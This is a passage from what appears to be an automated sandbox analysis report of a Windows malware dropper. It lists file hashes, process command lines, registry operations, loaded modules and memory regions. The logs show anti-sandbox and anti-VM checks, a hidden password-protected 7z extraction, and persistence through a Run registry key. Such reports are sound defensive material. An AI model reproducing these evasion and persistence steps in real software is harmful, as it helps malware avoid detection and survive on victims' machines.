| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe | 744.00 KB |
MD5:
2b495afa839e2073388f86180a04dce3
SHA1: 309b0af9198bacbe61f45106fa77bb4011fae25a SHA256: 05f630aad1741d54768ad8eaf7fd9e1e8666f38af55e88bac892853bb72758ae SSDeep: 12288:/8sRQCBnr44sUPCOSVBgDpSnw7oKVnq0PVGanIkxxkgUqFCy61J79Yqk:0uQCBr4rAmVWNJJVnqK+UxnUqEyAJ6q |
|
|
| C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | 11.50 KB |
MD5:
b0c77267f13b2f87c084fd86ef51ccfc
SHA1: f7543f9e9b4f04386dfbf33c38cbed1bf205afb3 SHA256: a0cac4cf4852895619bc7743ebeb89f9e4927ccdb9e66b1bcd92a4136d0f9c77 SSDeep: 192:4PtkiQJr7jHYT87RfwXQ6YSYtOuVDi7IsFW14Ll8CO:H78TQIgGCDp14LGC |
|
|
Host Behavior
File (219)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ |
|
45 | |
| Create Directory | C:\Users\ADU0VK~1\AppData\Local\Temp\ | - |
|
1 | |
| Create Directory | C:\Users | - |
|
2 | |
| Create Directory | C:\Users\ADU0VK~1 | - |
|
2 | |
| Create Directory | C:\Users\ADU0VK~1\AppData | - |
|
2 | |
| Create Directory | C:\Users\ADU0VK~1\AppData\Local | - |
|
2 | |
| Create Directory | C:\Users\ADU0VK~1\AppData\Local\Temp | - |
|
2 | |
| Create Directory | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp | - |
|
1 | |
| Create Temp File | C:\Users\ADU0VK~1\AppData\Local\Temp\nsdFD9F.tmp | path = C:\Users\ADU0VK~1\AppData\Local\Temp\, prefix = nsd |
|
1 | |
| Create Temp File | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp | path = C:\Users\ADU0VK~1\AppData\Local\Temp, prefix = nst |
|
1 | |
| Create Pipe | Anonymous read pipe | size = 0 |
|
2 | |
| Create Pipe | Anonymous read pipe | size = 0 |
|
2 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | type = size |
|
1 | |
| Get Info | C:\Users | type = file_attributes |
|
2 | |
| Get Info | C:\Users\ADU0VK~1 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\ADU0VK~1\AppData | type = file_attributes |
|
2 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local | type = file_attributes |
|
2 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp | type = file_attributes |
|
2 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | type = file_attributes |
|
45 | |
| Get Info | c:\cwsandbox\cwsandbox.ini | type = file_attributes |
|
1 | |
| Get Info | c:\test\vmversion.txt | type = file_attributes |
|
1 | |
| Get Info | c:\bin\AHookMonitor.dll | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\ | type = file_attributes |
|
1 | |
| Move | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe | source_filename = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\B.cab |
|
1 | |
| Read | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | size = 512, size_out = 512 |
|
73 | |
| Read | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | size = 4, size_out = 4 |
|
2 | |
| Read | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | size = 5993, size_out = 5993 |
|
1 | |
| Read | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | size = 6818, size_out = 6818 |
|
1 | |
| Read | - | size = 1023, size_out = 178 |
|
1 | |
| Write | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | size = 11776 |
|
1 | |
| Write | - | size = 6 |
|
1 | |
| Write | - | size = 26 |
|
1 | |
| Write | - | size = 52 |
|
1 | |
| Write | - | size = 66 |
|
1 | |
| Write | - | size = 48 |
|
1 | |
| Delete Directory | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\ | - |
|
1 | |
| Delete | C:\Users\ADU0VK~1\AppData\Local\Temp\nsdFD9F.tmp | - |
|
1 | |
| Delete | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp | - |
|
1 | |
| Delete | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\nsExec.dll | - |
|
1 | |
| Delete | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | - |
|
1 | |
| Delete | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\UserInfo.dll | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SysTracer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS | value_name = SystemProductName, data = "SATELLITE L870-18Z", type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 | value_name = Device Description, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | value_name = 0, data = IDE\DiskWD5000YS________________________________RJ13____\5&37d1a386&0&0.0.0, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = Restore, data = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe, size = 53, type = REG_SZ |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | A.exe x B.7z -psL3117nTGnp393SLZxZy -o"C:\Users\aDU0VK IWA5kLS\AppData\Roaming" -aoa | os_pid = 0x454, creation_flags = CREATE_NEW_CONSOLE, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | cmd /c start "" "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" | os_pid = 0x890, creation_flags = CREATE_NEW_CONSOLE, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 |
Module (453)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\UXTHEME.dll | base_address = 0x75540000 |
|
1 | |
| Load | C:\Windows\system32\USERENV.dll | base_address = 0x75120000 |
|
1 | |
| Load | C:\Windows\system32\SETUPAPI.dll | base_address = 0x76130000 |
|
1 | |
| Load | C:\Windows\system32\APPHELP.dll | base_address = 0x750d0000 |
|
1 | |
| Load | C:\Windows\system32\PROPSYS.dll | base_address = 0x74fd0000 |
|
1 | |
| Load | C:\Windows\system32\DWMAPI.dll | base_address = 0x75520000 |
|
1 | |
| Load | C:\Windows\system32\CRYPTBASE.dll | base_address = 0x75880000 |
|
1 | |
| Load | C:\Windows\system32\OLEACC.dll | base_address = 0x74f90000 |
|
1 | |
| Load | C:\Windows\system32\CLBCATQ.dll | base_address = 0x77570000 |
|
1 | |
| Load | C:\Windows\system32\VERSION.dll | base_address = 0x75760000 |
|
1 | |
| Load | C:\Windows\system32\SHFOLDER.dll | base_address = 0x75750000 |
|
1 | |
| Load | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | base_address = 0x75710000 |
|
1 | |
| Load | VBoxHook.dll | base_address = 0x0 |
|
1 | |
| Load | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\nsExec.dll | base_address = 0x756f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75c90000 |
|
26 | |
| Get Handle | VERSION | base_address = 0x0 |
|
1 | |
| Get Handle | SHFOLDER | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shlwapi.dll | base_address = 0x75920000 |
|
1 | |
| Get Handle | c:\windows\syswow64\shell32.dll | base_address = 0x76880000 |
|
1 | |
| Get Handle | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\system.dll | base_address = 0x75710000 |
|
140 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x76780000 |
|
4 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77d30000 |
|
16 | |
| Get Handle | dbghelp.dll | base_address = 0x0 |
|
1 | |
| Get Handle | pstorec.dll | base_address = 0x0 |
|
1 | |
| Get Handle | vmcheck.dll | base_address = 0x0 |
|
1 | |
| Get Handle | api_log.dll | base_address = 0x0 |
|
1 | |
| Get Handle | wpespy.dll | base_address = 0x0 |
|
1 | |
| Get Handle | SbieDll.dll | base_address = 0x0 |
|
1 | |
| Get Handle | dir_watch.dll | base_address = 0x0 |
|
1 | |
| Get Handle | cmdvrt32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | cuckoomon.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x76650000 |
|
3 | |
| Get Handle | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\nsExec.dll | base_address = 0x0 |
|
1 | |
| Get Filename | SHFOLDER | process_name = c:\users\adu0vk~1\appdata\local\temp\total.exe, file_name_orig = C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe, size = 1024 |
|
1 | |
| Get Filename | C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll | process_name = c:\users\adu0vk~1\appdata\local\temp\total.exe, file_name_orig = C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe, size = 1024 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoA, address_out = 0x75761ced |
|
1 | |
| Get Address | c:\windows\syswow64\shfolder.dll | function = SHGetFolderPathA, address_out = 0x75751528 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = 437, address_out = 0x7593bee6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultUILanguage, address_out = 0x75ca44ab |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = 680, address_out = 0x768d44f5 |
|
1 | |
| Get Address | c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\system.dll | function = Call, address_out = 0x757116df |
|
137 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexA, address_out = 0x75ca4c6b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexAA, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ca4a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75ca1410 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileAttributes, address_out = 0x0 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileAttributesA, address_out = 0x75ca5414 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileName, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75ca14b1 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharLower, address_out = 0x0 |
|
4 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharLowerA, address_out = 0x767a3e75 |
|
4 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strstr, address_out = 0x77dac780 |
|
15 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strstrA, address_out = 0x0 |
|
15 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75ca1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ca195e |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandle, address_out = 0x0 |
|
9 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75ca1245 |
|
9 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibrary, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x75ca49d7 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserName, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x7667a4b4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75ca11f8 |
|
1 | |
| Get Address | c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\system.dll | function = Alloc, address_out = 0x75711000 |
|
3 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwQuerySystemInformation, address_out = 0x77d4fda0 |
|
1 | |
| Get Address | c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\userinfo.dll | function = GetAccountType, address_out = 0x75701215 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CheckTokenMembership, address_out = 0x7665df04 |
|
2 | |
| Get Address | c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\userinfo.dll | function = GetAccountType, address_out = 0x756f1215 |
|
1 | |
| Get Address | c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\userinfo.dll | function = Exec, address_out = 0x75701000 |
|
1 | |
| Get Address | c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\userinfo.dll | function = Exec, address_out = 0x756f1000 |
|
1 | |
| Get Address | c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\system.dll | function = Store, address_out = 0x757110e0 |
|
1 |
System (34)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = AUFDDCNTXWT |
|
1 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
8 | |
| Get Time | type = Ticks, time = 195999 |
|
4 | |
| Get Time | type = Ticks, time = 196015 |
|
3 | |
| Get Time | type = Ticks, time = 197216 |
|
1 | |
| Get Time | type = Ticks, time = 197856 |
|
1 | |
| Get Time | type = Ticks, time = 197902 |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
11 | |
| Get Info | type = OS_WOW6432 |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Name |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\adu0vk~1\appdata\local\temp\total.exe | - |
|
1 |
Process #5: a.exe
22
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\adu0vk~1\appdata\local\temp\a.exe |
| Command Line | A.exe x B.7z -psL3117nTGnp393SLZxZy -o"C:\Users\aDU0VK IWA5kLS\AppData\Roaming" -aoa |
| Initial Working Directory | C:\Users\ADU0VK~1\AppData\Local\Temp\ |
| Monitor | Start Time: 00:02:39, Reason: Child Process |
| Unmonitor | End Time: 00:02:40, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x454 |
| Parent PID | 0x4c8 (c:\users\adu0vk~1\appdata\local\temp\total.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
764
0x
888
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x003b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| a.exe | 0x00400000 | 0x00499fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00620fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x009fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x01dfffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x755d0000 | 0x755d7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x755e0000 | 0x7563bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75640000 | 0x7567efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75880000 | 0x7588bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75890000 | 0x758effff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a55fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75a60000 | 0x75bbbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75bc0000 | 0x75c6bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75c90000 | 0x75d9ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75f20000 | 0x7600ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76050000 | 0x7611bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76650000 | 0x766effff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76780000 | 0x7687ffff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x774d0000 | 0x7756cfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77600000 | 0x7768ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77790000 | 0x777effff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x777f0000 | 0x77808fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77810000 | 0x7789efff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077930000 | 0x77930000 | 0x77a4efff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077a50000 | 0x77a50000 | 0x77b49fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77b50000 | 0x77cf8fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77d00000 | 0x77d09fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77d30000 | 0x77eaffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | - | size = 131072, size_out = 131072 |
|
3 | |
| Read | - | size = 58656, size_out = 58656 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\users\adu0vk~1\appdata\local\temp\a.exe, file_name_orig = C:\Users\ADU0VK~1\AppData\Local\Temp\A.exe, size = 260 |
|
1 |
System (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
4 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Operating System |
|
3 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #6: cmd.exe
52
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | cmd /c start "" "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" |
| Initial Working Directory | C:\Users\ADU0VK~1\AppData\Local\Temp\ |
| Monitor | Start Time: 00:02:39, Reason: Child Process |
| Unmonitor | End Time: 00:02:41, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x890 |
| Parent PID | 0x4c8 (c:\users\adu0vk~1\appdata\local\temp\total.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
894
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00121fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00230fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00240fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00860fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x01c6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c70000 | 0x01c70000 | 0x01fb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x4a920000 | 0x4a96bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x755d0000 | 0x755d7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x755e0000 | 0x7563bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75640000 | 0x7567efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x756e0000 | 0x756e6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75880000 | 0x7588bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75890000 | 0x758effff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a55fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75bc0000 | 0x75c6bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75c90000 | 0x75d9ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75f20000 | 0x7600ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76050000 | 0x7611bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76650000 | 0x766effff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76780000 | 0x7687ffff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x774d0000 | 0x7756cfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77600000 | 0x7768ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77790000 | 0x777effff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x777f0000 | 0x77808fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077930000 | 0x77930000 | 0x77a4efff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077a50000 | 0x77a50000 | 0x77b49fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77b50000 | 0x77cf8fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77d00000 | 0x77d09fff | Memory Mapped File | rwx |
